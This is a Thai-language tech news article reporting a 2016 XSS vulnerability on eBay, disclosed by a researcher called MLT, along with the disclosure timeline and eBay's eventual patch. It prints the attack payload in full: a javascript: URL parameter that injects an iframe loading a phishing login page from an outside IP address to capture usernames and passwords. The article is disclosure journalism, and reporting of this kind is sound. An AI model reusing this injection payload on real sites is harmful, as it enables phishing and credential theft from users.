Ingram SUSE

พบช่องโหว่ XSS บน eBay เสี่ยงถูกฝังโค้ดขโมยรหัสผ่าน

ebay_logo

นักวิจัยด้านความปลอดภัยนามปากกา MLT ได้ออกมาเปิดเผยถึงช่องโหว่ Cross-site Scripting (XSS) บนเว็บไซต์ eBay ซึ่งช่วยให้แฮ็คเกอร์สามารถลอบส่งโค้ดเข้าไปปลอมแปลงหน้า Login เพื่อหลอกขโมยรหัสผ่านจากผู้ใช้บริการหลายร้อยล้านคนได้อย่างแยบยล

Credit: Stefan Amer/ShutterStock
Credit: Stefan Amer/ShutterStock

แฝงหน้า Phishing ผ่านช่องโหว่ XSS

ช่องโหว่ XSS ที่ค้นพบนี้อยู่บน URL Parameter ที่ช่วยให้แฮ็คเกอร์สามารถลอบส่งโค้ด iFrame เข้ามายังเว็บไซต์ของ eBay ได้ ส่งผลให้แฮ็คเกอร์สามารถเชื่อมโยง iFrame ดังกล่าวกับหน้า Page สำหรับทำ Phishing เพื่อหลอกให้ผู้ใช้บริการมากรอก Username และ Password เพื่อขโมยออกไป ซึ่งทั้งหมดนี้ยังคงแสดงผลอยู่บนหน้าเว็บไซต์ปกติของ eBay

document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’)

หน้า Page สำหรับทำ Phishing แทบจะมีหน้าตาเหมือนหน้า Login ปกติของ eBay ทุกประการ ต่างกันเพียงแค่ URL ในส่วนช่วงหลังเท่านั้น ซึ่งผู้ใช้บริการส่วนใหญ่จะไม่สามารถจับสังเกตได้ เรียกได้ว่าเป็นการทำ Phishing ที่สุดแสนจะแนบเนียน

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29

ebay_xss_flaw_1

เมื่อผู้ใช้บริการกรอก Username และ Password ลงไปบนหน้าเว็บ Phishing นี้จะไม่สามารถเข้าใช้ระบบของ eBay ได้และข้อมูลทั้งหมดจะถูกส่งไปยังแฮ็คเกอร์ทันที ดูวิดีโอสาธิตตัวอย่างการโจมตีด้านล่าง

แจ้ง eBay ไปเมื่อเดือนธันวาคม แต่ไร้ซึ่งแพทช์อัพเดท

MLT ได้ส่งรายละเอียดช่องโหว่ไปยัง eBay ตั้งแต่เมื่อวันที่ 11 ธันวาคม หลังจากที่ eBay ได้รับเรื่องและมีการสอบถามข้อมูลเพิ่มเติม เรื่องก็เงียบหายไป ไม่มีแม้กระทั่งแพทช์ออกมาอัพเดท MLT จึงตัดสินใจเปิดเผยช่องโหว่นี้สู่สาธารณะ ซึ่งก็เปิดไปตามคาด เพียงไม่กี่วันถัดมา eBay ก็ได้ออกแพทช์เพื่ออุดช่องโหว่เป็นที่เรียบร้อย ต้องขอบคุณ MLT ที่ช่วยให้ผู้ใช้บริการหลายคนรอดพ้นจากการถูกขโมยรหัสผ่าน อย่างไรก็ตาม ยังคงแนะนำให้ผู้ใช้ทุกคนเปลี่ยนรหัสผ่านใหม่ เพื่อความมั่นใจว่ารหัสผ่านล่าสุดจะไม่ได้ถูกขโมยไป

ที่มา: http://thehackernews.com/2016/01/ebay-hacking.html

About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

สรุปคำแนะนำและแนวทางปฏิบัติด้าน Password ล่าสุดจาก NIST

บทความนี้ได้สรุปคำแนะนำและแนวทางปฏิบัติด้าน Password จากเอกสาร NIST Special Publication 800-63B Rev3 ของ สถาบันมาตรฐานและเทคโนโลยีแห่งชาติสหรัฐฯ หรือ NIST ได้แก่ การสร้างรหัสผ่านใหม่ การพิสูจน์ตัวตนด้วยรหัสผ่าน …

FBI จับกุมผู้ต้องหาวางแผนระเบิดดาต้าเซ็นเตอร์ของ AWS

ในสังคมอันกว้างใหญ่นี้มีอาชญากรมากมายเกิดขึ้นทุกวัน ทั้งจากโลกไซเบอร์เองหรือคนที่มีความคิดรุนแรงหวังสร้างความเสียทาง Physical ให้แก่โครงสร้างพื้นฐานทางไอที ล่าสุด FBI ก็ได้เข้าจับกุมชายรายหนึ่งที่วางแผนลอบวางระเบิดดาต้าเซ็นเตอร์ของ AWS เพราะหวังทำลายระบบอินเทอร์เน็ตส่งผลกระทบเป็นวงกว้าง